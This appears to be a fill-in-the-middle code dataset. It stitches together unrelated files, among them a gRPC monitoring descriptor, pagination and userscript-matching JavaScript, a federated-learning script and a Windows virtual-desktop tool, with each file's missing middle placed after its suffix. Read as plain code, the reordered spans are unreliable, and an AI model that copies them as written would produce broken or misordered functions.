serialized_options=b'\202\323\344\223\002>\"9/api/v1/monitoring/monitored_entity/createMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='updateMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.updateMonitoredEntity',
index=1,
containing_service=None,
input_type=_UPDATEMONITOREDENTITYREQUEST,
output_type=_UPDATEMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002>29/api/v1/monitoring/monitored_entity/updateMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='findMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.findMonitoredEntity',
index=2,
containing_service=None,
input_type=_FINDMONITOREDENTITYREQUEST,
output_type=_FINDMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002<\"7/api/v1/monitoring/monitored_entity/findMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='deleteMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.deleteMonitoredEntity',
index=3,
containing_service=None,
input_type=_DELETEMONITOREDENTITYREQUEST,
output_type=_DELETEMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002>*9/api/v1/monitoring/monitored_entity/deleteMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='getProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.getProfiler',
index=4,
containing_service=None,
input_type=_GETPROFILERREQUEST,
output_type=_GETPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0021\022//api/v1/monitoring/monitored_entity/getProfiler',
),
_descriptor.MethodDescriptor(
name='createProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.createProfiler',
index=5,
containing_service=None,
input_type=_CREATEPROFILERREQUEST,
output_type=_CREATEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0027\"2/api/v1/monitoring/monitored_entity/createProfiler:\001*',
),
_descriptor.MethodDescriptor(
name='updateProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.updateProfiler',
index=6,
containing_service=None,
input_type=_UPDATEPROFILERREQUEST,
output_type=_UPDATEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002722/api/v1/monitoring/monitored_entity/updateProfiler:\001*',
),
_descriptor.MethodDescriptor(
name='listProfilers',
full_name='ai.verta.monitoring.DataMonitoringService.listProfilers',
index=7,
containing_service=None,
input_type=_LISTPROFILERSREQUEST,
output_type=_LISTPROFILERSREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0023\0221/api/v1/monitoring/monitored_entity/listProfilers',
),
_descriptor.MethodDescriptor(
name='deleteProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.deleteProfiler',
index=8,
containing_service=None,
input_type=_DELETEPROFILERREQUEST,
output_type=_DELETEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0026*1/api/v1/monitoring/monitored_entity/deleteProfile:\001*',
),
_descriptor.MethodDescriptor(
name='getProfilerStatus',
full_name='ai.verta.monitoring.DataMonitoringService.getProfilerStatus',
index=9,
containing_service=None,
input_type=_GETPROFILERSTATUSREQUEST,
output_type=_GETPROFILERSTATUSREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0027\0225/api/v1/monitoring/monitored_entity/getProfilerStatus',
),
_descriptor.MethodDescriptor(
name='findProfilersForMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.findProfilersForMonitoredEntity',
index=10,
containing_service=None,
input_type=_FINDPROFILERSFORMONITOREDENTITYREQUEST,
output_type=_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\002H\"C/api/v1/monitoring/monitored_entity/findProfilersForMonitoredEntity:\001*',
),
_descriptor.MethodDescriptor(
name='enableProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.enableProfiler',
index=11,
containing_service=None,
input_type=_ENABLEPROFILERREQUEST, | output_type=_ENABLEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0027\"2/api/v1/monitoring/monitored_entity/enableProfiler:\001*',
),
_descriptor.MethodDescriptor(
name='disableProfiler',
full_name='ai.verta.monitoring.DataMonitoringService.disableProfiler',
index=12,
containing_service=None,
input_type=_DISABLEPROFILERREQUEST,
output_type=_DISABLEPROFILERREQUEST_RESPONSE,
serialized_options=b'\202\323\344\223\0028\"3/api/v1/monitoring/monitored_entity/disableProfiler:\001*',
),
])
_sym_db.RegisterServiceDescriptor(_DATAMONITORINGSERVICE)
DESCRIPTOR.services_by_name['DataMonitoringService'] = _DATAMONITORINGSERVICE
# @@protoc_insertion_point(module_scope) | |
model.js | export function | (pageCount, currentPage, showPages, marginPageCount, surroundingPageCount) {
const pages = []
if (showPages) {
const pageNums = []
const addPage = (n) => {
if (n >= 1 && n <= pageCount) {
pageNums.push(n)
}
}
// Start by defining the window of pages to show around the current page.
// If the window goes off either edge, shift it until it fits.
let extentLeft = currentPage - surroundingPageCount
let extentRight = currentPage + surroundingPageCount
if (extentLeft < 1 && extentRight > pageCount) {
// Our window is larger than the entire range,
// so simply display every page.
extentLeft = 1
extentRight = pageCount
} else if (extentLeft < 1) {
while (extentLeft < 1) {
extentLeft++
extentRight++
}
} else if (extentRight > pageCount) {
while (extentRight > pageCount) {
extentLeft--
extentRight--
}
}
// Next, include the pages in the margins.
// If a margin page is already covered in the window,
// extend the window to the other direction.
for (let i = 1; i <= marginPageCount; i++) {
const leftPage = i
const rightPage = pageCount - (i - 1)
if (leftPage >= extentLeft) {
extentRight++
} else {
addPage(leftPage)
}
if (rightPage <= extentRight) {
extentLeft--
} else {
addPage(rightPage)
}
}
for (let i = extentLeft; i <= extentRight; i++) {
addPage(i)
}
const sorted = pageNums
.slice()
.sort((a, b) => a - b)
.filter((item, idx, ary) => !idx || item !== ary[idx - 1])
for (let idx = 0; idx < sorted.length; idx++) {
const num = sorted[idx]
const selected = num === currentPage
if (idx === 0) {
if (num !== 1) {
// If the first page isn't page one,
// we need to add a break
pages.push({
type: 'BREAK',
num: 1,
})
}
pages.push({
type: 'NUM',
num,
selected,
})
} else {
const last = sorted[idx - 1]
const delta = num - last
if (delta === 1) {
pages.push({
type: 'NUM',
num,
selected,
})
} else {
// We skipped some, so add a break
pages.push({
type: 'BREAK',
num: num - 1,
})
pages.push({
type: 'NUM',
num,
selected,
})
}
}
}
const lastPage = pages[pages.length - 1]
if (lastPage.type === 'NUM' && lastPage.num !== pageCount) {
// The last page we rendered wasn't the actual last page,
// so we need an additional break
pages.push({
type: 'BREAK',
num: pageCount,
})
}
}
const prev = {type: 'PREV', num: currentPage - 1, disabled: currentPage === 1}
const next = {type: 'NEXT', num: currentPage + 1, disabled: currentPage === pageCount}
return [prev, ...pages, next]
}
export function buildComponentData(page, hrefBuilder, onClick) {
const props = {}
let content = ''
let key = ''
switch (page.type) {
case 'PREV': {
key = 'page-prev'
content = 'Previous'
if (page.disabled) {
Object.assign(props, {as: 'span', 'aria-disabled': 'true'})
} else {
Object.assign(props, {
rel: 'prev',
href: hrefBuilder(page.num),
'aria-label': 'Previous Page',
onClick,
})
}
break
}
case 'NEXT': {
key = 'page-next'
content = 'Next'
if (page.disabled) {
Object.assign(props, {as: 'span', 'aria-disabled': 'true'})
} else {
Object.assign(props, {
rel: 'next',
href: hrefBuilder(page.num),
'aria-label': 'Next Page',
onClick,
})
}
break
}
case 'NUM': {
key = `page-${page.num}`
content = page.num
if (page.selected) {
Object.assign(props, {as: 'em', 'aria-current': 'page'})
} else {
Object.assign(props, {href: hrefBuilder(page.num), 'aria-label': `Page ${page.num}`, onClick})
}
break
}
case 'BREAK': {
key = `page-${page.num}-break`
content = '…'
Object.assign(props, {as: 'span', 'aria-disabled': true})
}
}
return {props, key, content}
}
| buildPaginationModel |
keras_search_space.py | from collections.abc import Iterable
from functools import reduce
import networkx as nx
from tensorflow import keras
from tensorflow.python.keras.utils.vis_utils import model_to_dot
from deephyper.core.exceptions.nas.space import (InputShapeOfWrongType,
NodeAlreadyAdded,
StructureHasACycle,
WrongOutputShape,
WrongSequenceToSetOperations)
from deephyper.search.nas.model.space import NxSearchSpace
from deephyper.search.nas.model.space.node import (ConstantNode, Node,
VariableNode)
from deephyper.search.nas.model.space.op.basic import Tensor
from deephyper.search.nas.model.space.op.merge import Concatenate
from deephyper.search.nas.model.space.op.op1d import Identity
class KSearchSpace(NxSearchSpace):
"""A KSearchSpace represents a search space of neural networks.
>>> from tensorflow.keras.utils import plot_model
>>> from deephyper.search.nas.model.space import KSearchSpace
>>> from deephyper.search.nas.model.space.node import VariableNode, ConstantNode
>>> from deephyper.search.nas.model.space.op.op1d import Dense
>>> struct = KSearchSpace((5, ), (1, ))
>>> vnode = VariableNode()
>>> struct.connect(struct.input_nodes[0], vnode)
>>> vnode.add_op(Dense(10))
>>> vnode.add_op(Dense(20))
>>> output_node = ConstantNode(op=Dense(1))
>>> struct.connect(vnode, output_node)
>>> struct.set_ops([0])
>>> model = struct.create_model()
Args:
input_shape (list(tuple(int))): list of shapes of all inputs.
output_shape (tuple(int)): shape of output.
Raises:
InputShapeOfWrongType: [description]
"""
def __init__(self, input_shape, output_shape, *args, **kwargs):
super().__init__()
if type(input_shape) is tuple:
# we have only one input tensor here
op = Tensor(keras.layers.Input(input_shape, name="input_0"))
self.input_nodes = [ConstantNode(op=op, name='Input_0')]
elif type(input_shape) is list and all(map(lambda x: type(x) is tuple, input_shape)):
# we have a list of input tensors here
self.input_nodes = list()
for i in range(len(input_shape)):
op = Tensor(keras.layers.Input(
input_shape[i], name=f"input_{i}"))
inode = ConstantNode(op=op, name=f'Input_{i}')
self.input_nodes.append(inode)
else:
raise InputShapeOfWrongType(input_shape)
for node in self.input_nodes:
self.graph.add_node(node)
self.output_shape = output_shape
self.output_node = None
self._model = None
@property
def depth(self):
if self._model is None:
raise RuntimeError(
"Can't compute depth of model without creating a model.")
return len(self.longest_path)
@property
def longest_path(self):
if self._model is None:
raise RuntimeError(
"Can't compute longest path of model without creating a model.")
nx_graph = nx.drawing.nx_pydot.from_pydot(model_to_dot(self._model))
return nx.algorithms.dag.dag_longest_path(nx_graph)
def set_ops(self, indexes):
"""Set the operations for each node of each cell of the search_space.
Args:
indexes (list): element of list can be float in [0, 1] or int.
Raises:
WrongSequenceToSetOperations: raised when 'indexes' is of a wrong length.
"""
if len(indexes) != len(list(self.variable_nodes)):
raise WrongSequenceToSetOperations(
indexes, list(self.variable_nodes))
for op_i, node in zip(indexes, self.variable_nodes):
node.set_op(op_i)
output_nodes = self.get_output_nodes()
self.output_node = self.set_output_node(self.graph, output_nodes)
def set_output_node(self, graph, output_nodes):
"""Set the output node of the search_space.
Args:
graph (nx.DiGraph): graph of the search_space.
output_nodes (Node): nodes of the current search_space without successors.
Returns:
Node: output node of the search_space.
"""
if len(output_nodes) == 1:
node = ConstantNode(op=Identity(), name='Structure_Output')
graph.add_node(node)
graph.add_edge(output_nodes[0], node)
else:
node = ConstantNode(name='Structure_Output')
op = Concatenate(self, output_nodes) | """Create the tensors corresponding to the search_space.
Returns:
A keras.Model for the current search_space with the corresponding set of operations.
"""
output_tensor = self.create_tensor_aux(self.graph, self.output_node)
if output_tensor.get_shape()[1:] != self.output_shape:
raise WrongOutputShape(output_tensor, self.output_shape)
input_tensors = [inode._tensor for inode in self.input_nodes]
self._model = keras.Model(inputs=input_tensors, outputs=output_tensor)
return keras.Model(inputs=input_tensors, outputs=output_tensor) | node.set_op(op=op)
return node
def create_model(self): |
tester.js | import * as tld from '#/common/tld';
import cache from './cache';
import { getOption, hookOptions } from './options';
tld.initTLD(true);
const RE_MATCH_PARTS = /(.*?):\/\/([^/]*)\/(.*)/;
let blacklistRules = [];
hookOptions((changes) => {
if ('blacklist' in changes) resetBlacklist(changes.blacklist || '');
});
const RE_HTTP_OR_HTTPS = /^https?$/i;
/*
Simple FIFO queue for the results of testBlacklist, cached separately from the main |cache|
because the blacklist is updated only once in a while so its entries would be crowding
the main cache and reducing its performance (objects with lots of keys are slow to access).
We also don't need to auto-expire the entries after a timeout.
The only limit we're concerned with is the overall memory used.
The limit is specified in the amount of unicode characters (string length) for simplicity.
Disregarding deduplication due to interning, the actual memory used is approximately twice as big:
2 * keyLength + objectStructureOverhead * objectCount
*/
const MAX_BL_CACHE_LENGTH = 100e3;
let blCache = {};
let blCacheSize = 0;
/**
* Test glob rules like `@include` and `@exclude`.
*/
export function testGlob(url, rules) {
return rules.some((rule) => {
const key = `re:${rule}`;
let re = cache.get(key);
if (re) {
cache.hit(key);
} else {
re = autoReg(rule);
cache.put(key, re);
}
return re.test(url);
});
}
/**
* Test match rules like `@match` and `@exclude_match`.
*/
export function testMatch(url, rules) {
return rules.some((rule) => {
const key = `match:${rule}`;
let matcher = cache.get(key);
if (matcher) {
cache.hit(key);
} else {
matcher = matchTester(rule);
cache.put(key, matcher);
}
return matcher.test(url);
});
}
export function testScript(url, script) {
const { custom, meta } = script;
const mat = mergeLists(custom.origMatch && meta.match, custom.match);
const inc = mergeLists(custom.origInclude && meta.include, custom.include);
const exc = mergeLists(custom.origExclude && meta.exclude, custom.exclude);
const excMat = mergeLists(custom.origExcludeMatch && meta.excludeMatch, custom.excludeMatch);
// match all if no @match or @include rule
let ok = !mat.length && !inc.length;
// @match
ok = ok || testMatch(url, mat);
// @include
ok = ok || testGlob(url, inc);
// @exclude-match
ok = ok && !testMatch(url, excMat);
// @exclude
ok = ok && !testGlob(url, exc);
return ok;
}
function testRegExp(re, text) {
const key = `re-test:${re.source}:${text}`;
let res = cache.get(key);
if (!res) {
res = re.test(text) ? 1 : -1;
cache.put(key, res);
}
return res === 1;
}
function mergeLists(...args) {
return args.reduce((res, item) => (item ? res.concat(item) : res), []);
}
function str2RE(str) {
const re = str.replace(/([.?+[\]{}()|^$])/g, '\\$1').replace(/\*/g, '.*?');
return re;
}
function autoReg(str) {
if (str.length > 1 && str[0] === '/' && str[str.length - 1] === '/') {
return new RegExp(str.slice(1, -1)); // Regular-expression
}
const reStr = str2RE(str);
if (tld.isReady() && str.includes('.tld/')) {
const reTldStr = reStr.replace('\\.tld/', '((?:\\.\\w+)+)/');
return {
test: (tstr) => {
const matches = tstr.match(reTldStr);
if (matches) {
const suffix = matches[1].slice(1);
if (tld.getPublicSuffix(suffix) === suffix) return true;
}
return false;
},
};
}
const re = new RegExp(`^${reStr}$`); // String with wildcards
return { test: tstr => testRegExp(re, tstr) };
}
function matchScheme(rule, data) {
// exact match
if (rule === data) return 1;
// * = http | https
// support http*
if ([
'*',
'http*',
].includes(rule) && RE_HTTP_OR_HTTPS.test(data)) return 1;
return 0;
}
const RE_STR_ANY = '(?:|.*?\\.)';
const RE_STR_TLD = '((?:\\.\\w+)+)';
function hostMatcher(rule) {
// *.example.com
// www.google.*
// www.google.tld
let prefix = '';
let base = rule;
let suffix = '';
if (rule.startsWith('*.')) {
base = base.slice(2);
prefix = RE_STR_ANY;
}
if (tld.isReady() && rule.endsWith('.tld')) {
base = base.slice(0, -4);
suffix = RE_STR_TLD;
}
const re = new RegExp(`^${prefix}${str2RE(base)}${suffix}$`);
return (data) => {
// * matches all
if (rule === '*') return 1;
// exact match
if (rule === data) return 1;
const matches = data.match(re);
if (matches) {
const [, tldStr] = matches;
if (!tldStr) return 1;
const tldSuffix = tldStr.slice(1);
return tld.getPublicSuffix(tldSuffix) === tldSuffix;
}
return 0;
};
}
function pathMatcher(rule) {
const iHash = rule.indexOf('#');
let iQuery = rule.indexOf('?');
let strRe = str2RE(rule);
if (iQuery > iHash) iQuery = -1;
if (iHash < 0) {
if (iQuery < 0) strRe = `^${strRe}(?:[?#]|$)`;
else strRe = `^${strRe}(?:#|$)`;
}
const reRule = new RegExp(strRe);
return data => testRegExp(reRule, data);
}
function matchTester(rule) {
let test;
if (rule === '<all_urls>') {
test = () => true;
} else {
const ruleParts = rule.match(RE_MATCH_PARTS);
if (ruleParts) {
const matchHost = hostMatcher(ruleParts[2]);
const matchPath = pathMatcher(ruleParts[3]);
test = (url) => {
const parts = url.match(RE_MATCH_PARTS);
return !!ruleParts && !!parts
&& matchScheme(ruleParts[1], parts[1])
&& matchHost(parts[2])
&& matchPath(parts[3]);
};
} else {
// Ignore invalid match rules
test = () => false;
}
}
return { test };
}
function checkPrefix(prefix, rule) {
if (rule.startsWith(prefix)) {
return rule.slice(prefix.length).trim();
}
}
export function testBlacklist(url) {
let res = blCache[url];
if (res === undefined) {
const rule = blacklistRules.find(({ test }) => test(url));
if (rule) res = rule.reject;
updateBlacklistCache(url, res || false);
}
return res;
}
export function resetBlacklist(list) {
const rules = list == null ? getOption('blacklist') : list;
if (process.env.DEBUG) {
console.info('Reset blacklist:', rules);
}
// XXX compatible with {Array} list in v2.6.1-
blacklistRules = (Array.isArray(rules) ? rules : (rules || '').split('\n'))
.map((line) => {
const item = line.trim();
if (!item || item.startsWith('#')) return null;
/**
* @include and @match rules are added for people who need a whitelist.
*/
// @include
const includeRule = checkPrefix('@include ', item);
if (includeRule) {
return {
test: autoReg(includeRule).test,
reject: false,
};
}
// @match
const matchRule = checkPrefix('@match ', item);
if (matchRule) {
return {
test: matchTester(matchRule).test, | reject: false,
};
}
// @exclude
const excludeRule = checkPrefix('@exclude ', item);
if (excludeRule) {
return {
test: autoReg(excludeRule).test,
reject: true,
};
}
// domains
if (item.indexOf('/') < 0) {
return {
test: matchTester(`*://${item}/*`).test,
reject: true,
};
}
// @exclude-match
return {
test: matchTester(item).test,
reject: true,
};
})
.filter(Boolean);
blCache = {};
blCacheSize = 0;
}
function updateBlacklistCache(key, value) {
blCache[key] = value;
blCacheSize += key.length;
if (blCacheSize > MAX_BL_CACHE_LENGTH) {
Object.keys(blCache)
.some((k) => {
blCacheSize -= blCache[k].length;
delete blCache[k];
// reduce the cache to 75% so that this function doesn't run too often.
return blCacheSize < MAX_BL_CACHE_LENGTH * 3 / 4;
});
}
} | |
train_script.py | # -*- coding: utf-8 -*-
import numpy as np
np.set_printoptions(precision=6, threshold=1e3)
import torch
from torchvision import datasets, transforms
import copy
import torch.nn as nn
from torch.utils.data import DataLoader
def mnist_iid(dataset, K, M):
dict_users, all_idxs = {}, [i for i in range(len(dataset))]
for i in range(M):
dict_users[i] = set(np.random.choice(all_idxs, int(K[i]), replace=False))
all_idxs = list(set(all_idxs) - dict_users[i])
return dict_users
def load_fmnist_iid(K):
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset_train = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=True, transform=transform)
dataset_test = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=False, transform=transform)
loader = DataLoader(dataset_train, batch_size=len(dataset_train), shuffle=False)
images, labels = next(enumerate(loader))[1]
images, labels = images.numpy(), labels.numpy()
D_k = int(len(labels) / K)
train_images = []
train_labels = []
dict_users = {i: np.array([], dtype='int64') for i in range(K)}
all_idxs = np.arange(len(labels))
D = np.zeros(K)
for i in range(K):
dict_users[i] = set(np.random.choice(all_idxs, int(D_k), replace=False))
all_idxs = list(set(all_idxs) - dict_users[i])
train_images.append(images[list(dict_users[i])])
train_labels.append(labels[list(dict_users[i])])
D[i] = len(dict_users[i])
test_loader = DataLoader(dataset_test, batch_size=len(dataset_test), shuffle=True)
test_images, test_labels = next(enumerate(test_loader))[1]
return train_images, train_labels, test_images.numpy(), test_labels.numpy(), D
def | (K, NUM_SHARDS):
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset_train = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=True, transform=transform)
dataset_test = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=False, transform=transform)
loader = DataLoader(dataset_train, batch_size=len(dataset_train), shuffle=False)
images, labels = next(enumerate(loader))[1]
images, labels = images.numpy(), labels.numpy()
train_images = []
train_labels = []
# PART = 10
PART = 1
num_shards = K * NUM_SHARDS * PART
num_imgs = int(len(images) / num_shards)
idx_shard = [i for i in range(num_shards)]
dict_users = {i: np.array([], dtype='int64') for i in range(K)}
all_idxs = np.arange(len(labels))
# sort labels
idxs_labels = np.vstack((all_idxs, labels))
idxs_labels = idxs_labels[:, idxs_labels[1, :].argsort()]
all_idxs = idxs_labels[0, :]
idx_shard = idx_shard[::PART]
D = np.zeros(K)
for i in range(K):
rand_set = set(np.random.choice(idx_shard, NUM_SHARDS, replace=False))
idx_shard = list(set(idx_shard) - rand_set)
for rand in rand_set:
dict_users[i] = np.concatenate((dict_users[i], all_idxs[rand * num_imgs:(rand + 1) * num_imgs]), axis=0)
train_images.append(images[dict_users[i]])
train_labels.append(labels[dict_users[i]])
D[i] = len(dict_users[i])
test_loader = DataLoader(dataset_test, batch_size=len(dataset_test), shuffle=True)
test_images, test_labels = next(enumerate(test_loader))[1]
return train_images, train_labels, test_images.numpy(), test_labels.numpy(), D
def local_update(setup, d, model1, train_images, train_labels, idx, batch_size):
initital_weight = copy.deepcopy(model1.state_dict())
model = copy.deepcopy(model1)
model.train()
loss_function = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=setup.lr, momentum=setup.momentum)
# optimizer = torch.optim.Adam(model.parameters(), lr=setup.lr)
epoch_loss = []
images = np.array_split(train_images[idx], len(train_images[idx]) // batch_size)
labels = np.array_split(train_labels[idx], len(train_labels[idx]) // batch_size)
for epoch in range(setup.local_ep):
batch_loss = []
for b_idx in range(len(images)):
model.zero_grad()
log_probs = model(torch.tensor(images[b_idx].copy(), device=setup.device))
local_loss = loss_function(log_probs, torch.tensor(labels[b_idx].copy(), device=setup.device))
local_loss.backward()
optimizer.step()
if setup.verbose == 2:
print('User: {}, Epoch: {}, Batch No: {}/{} Loss: {:.6f}'.format(idx,
epoch, b_idx + 1, len(images),
local_loss.item()))
batch_loss.append(local_loss.item())
epoch_loss.append(sum(batch_loss) / len(batch_loss))
copyw = copy.deepcopy(model.state_dict())
gradient2 = np.array([[]])
w2 = np.array([[]])
for item in copyw.keys():
gradient2 = np.hstack((gradient2, np.reshape((initital_weight[item] - copyw[item]).cpu().numpy(),
[1, -1]) / setup.lr))
w2 = np.hstack((w2, np.reshape((copyw[item] - initital_weight[item]).cpu().numpy(),
[1, -1])))
return w2, sum(epoch_loss) / len(epoch_loss), gradient2
def test_model(model, setup, test_images, test_labels):
model.eval()
loss, total, correct = 0.0, 0.0, 0.0
images = torch.tensor(test_images).to(setup.device)
labels = torch.tensor(test_labels).to(setup.device)
outputs = model(images).to(setup.device)
loss_function = nn.CrossEntropyLoss()
batch_loss = loss_function(outputs, labels)
loss += batch_loss.item()
_, pred_labels = torch.max(outputs, 1)
pred_labels = pred_labels.view(-1)
correct += torch.sum(torch.eq(pred_labels, labels)).item()
total += len(labels)
accuracy = correct / total
if setup.verbose:
print('Average loss: {:.4f} \nAccuracy: {}/{} ({:.2f}%)\n'.format(
loss, int(correct), int(total), 100.0 * accuracy))
return accuracy, loss
| load_fmnist_noniid |
migration_up.go | /*
Copyright © 2020 NAME HERE <EMAIL ADDRESS>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package cmd
import (
migration "github.com/hermeschat/engine/db/migrations"
"github.com/hermeschat/engine/monitoring"
"github.com/spf13/cobra"
)
// upCmd represents the up command
var upCmd = &cobra.Command{
Use: "up",
Short: "",
Long: ``,
Run: func(cmd *cobra.Command, args []string) {
m, err := migration.New()
if err != nil { | err = m.Up()
if err != nil {
monitoring.Logger().Fatalf("%s\n", err)
}
},
}
func init() {
migrationCmd.AddCommand(upCmd)
// Here you will define your flags and configuration settings.
// Cobra supports Persistent Flags which will work for this command
// and all subcommands, e.g.:
// upCmd.PersistentFlags().String("foo", "", "A help for foo")
// Cobra supports local flags which will only run when this command
// is called directly, e.g.:
// upCmd.Flags().BoolP("toggle", "t", false, "Help message for toggle")
}
|
monitoring.Logger().Fatalf("%s\n", err)
}
|
vdesk.py | import user32
import win32con
import ctypes
import collections
class VirtualDesktopException(Exception):
pass
class NoForegroundWindow(VirtualDesktopException):
pass
class VirtualDesktop(object):
def __init__(self):
self.window = []
self.removed_windows = []
def remove_foreground_window(self):
foreground_window = user32.GetForegroundWindow()
if user32.IsWindowVisible(foreground_window):
self.removed_windows.append(foreground_window)
user32.ShowWindow(foreground_window, win32con.SW_HIDE)
return foreground_window
raise NoForegroundWindow("This Desktop is empty of windows.")
def add_window(self, window):
self.window.append(window)
def show(self):
self.removed_windows = []
for Window in self.window:
user32.ShowWindow(Window, win32con.SW_SHOW)
if len(self.window) > 0:
user32.SetForegroundWindow(self.window[-1])
def hide(self):
self.window = []
def enum_windows_proc(hWnd, lParam):
if not hWnd: return True
if not user32.IsWindowVisible(hWnd): return True
# Get Window Title
length = user32.SendMessage(hWnd, win32con.WM_GETTEXTLENGTH, 0, 0)
buffer = ctypes.create_unicode_buffer(length + 1)
if not user32.SendMessage(hWnd, win32con.WM_GETTEXT, length + 1, ctypes.byref(buffer)):
return True
if buffer.value != "Program Manager":
if not (hWnd in self.removed_windows):
if hWnd == user32.GetForegroundWindow():
self.window.append(hWnd)
else:
self.window.insert(0, hWnd)
user32.ShowWindow(hWnd, win32con.SW_HIDE)
return True
user32.EnumWindows(enum_windows_proc, 0)
def __del__(self):
self.show()
class DesktopManager(object):
__Previous = 1
__Next = -1
def __init__(self, desktop_count=4):
self.Desktops = collections.deque([VirtualDesktop() for x in xrange(desktop_count)])
self.Index = collections.deque(range(desktop_count))
def _move(self, direction):
|
def _display_desktop(self, direction):
self.Desktops[0].hide()
self._move(direction)
self.Desktops[0].show()
def _move_window_to(self, direction, HideWindow=True):
foreground_window = self.Desktops[0].remove_foreground_window()
self._move(direction)
self.Desktops[0].add_window(foreground_window)
self._move(-direction)
def display_next(self):
self._display_desktop(self.__Next)
def display_previous(self):
self._display_desktop(self.__Previous)
def move_window_to_next_desktop(self):
self._move_window_to(self.__Next)
def move_window_to_previous_desktop(self):
self._move_window_to(self.__Previous)
def move_window_to_next_desktop_and_display(self):
self._move_window_to(self.__Next)
self._display_desktop(self.__Next)
def move_window_to_previous_desktop_and_display(self):
self._move_window_to(self.__Previous)
self._display_desktop(self.__Previous)
def get_current_desktop_number(self):
return self.Index[0]
def show_all_windows(self):
[Desktop.show() for Desktop in self.Desktops]
| self.Desktops.rotate(direction)
self.Index.rotate(direction) |
_showtickprefix.py | import _plotly_utils.basevalidators
class ShowtickprefixValidator(
_plotly_utils.basevalidators.EnumeratedValidator
):
def __init__(
self,
plotly_name='showtickprefix',
parent_name='layout.scene.zaxis',
**kwargs
):
super(ShowtickprefixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='plot', | role='style',
values=['all', 'first', 'last', 'none'],
**kwargs
) |
|
test_on_policy_model.py | from collections import OrderedDict
import pytest
import gym
from gym import spaces
import torch
from torch import nn
import torch.nn.functional as F
from torch import distributions
import pytorch_lightning as pl
from lightning_baselines3.on_policy_models.on_policy_model import OnPolicyModel
class | (OnPolicyModel):
def __init__(self, *args, **kwargs):
super(DummyModel, self).__init__(*args, **kwargs)
if isinstance(self.action_space, spaces.Discrete):
self.p = nn.Parameter(torch.ones(1, self.action_space.n) * 0.5)
elif isinstance(self.action_space, spaces.Box):
self.p = nn.Parameter(torch.ones(1, self.action_space.shape[0] * 2) * 0.5)
else:
raise Exception('Incompatible environment action space')
def forward(self, x, **kwargs):
p = self.p.expand(x.shape[0], self.p.shape[-1])
if isinstance(self.action_space, spaces.Discrete):
dist = distributions.Categorical(probs=F.softmax(p, dim=1))
elif isinstance(self.action_space, spaces.Box):
p = torch.chunk(p, 2, dim=1)
dist = distributions.Normal(loc=p[0], scale=1 + p[1] ** 2)
return dist, torch.ones_like(x)[:, :1]
def predict(self, x, deterministic=True):
p = self.p.expand(x.shape[0], self.p.shape[-1])
if deterministic:
if isinstance(self.action_space, spaces.Discrete):
out = torch.max(p, dim=1)[1]
elif isinstance(self.action_space, spaces.Box):
out = torch.chunk(p, 2, dim=1)[0]
else:
if isinstance(self.action_space, spaces.Discrete):
out = distributions.Categorical(probs=F.softmax(p, dim=1)).sample()
elif isinstance(self.action_space, spaces.Box):
p = torch.chunk(p, 2, dim=1)
out = distributions.Normal(loc=p[0], scale=1 + p[1] ** 2).sample()
return out.cpu().numpy()
def training_step(self, x, batch_idx):
loss = self(x.observations)[0].entropy().mean()
self.log('loss', loss)
return loss
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)
return optimizer
@pytest.mark.parametrize("env_id", ["CartPole-v1", "MountainCar-v0", "MountainCarContinuous-v0"])
def test_on_policy_model(env_id):
"""
Check that environmnent integrated in Gym pass the test.
:param env_id: (str)
"""
model = DummyModel(
env_id,
eval_env=env_id,
buffer_length=512,
num_rollouts=1,
batch_size=32,
epochs_per_rollout=10,
num_eval_episodes=10,
gamma=0.9,
gae_lambda=0.95,
use_sde=False,
sde_sample_freq=-1,
verbose=1,
seed=1234)
trainer = pl.Trainer(max_epochs=2, terminate_on_nan=True)
trainer.fit(model)
| DummyModel |
get_sasa.py | from molsysmt import puw
from molsysmt.basic import convert, select, get
from molsysmt._private_tools._digestion import digest_engine, digest_target
import numpy as np
def | (molecular_system, target='atom', selection='all', frame_indices='all', syntaxis='MolSysMT',
engine='MDTraj'):
engine = digest_engine(engine)
target = digest_target(target)
if engine == 'MDTraj':
from mdtraj import shrake_rupley
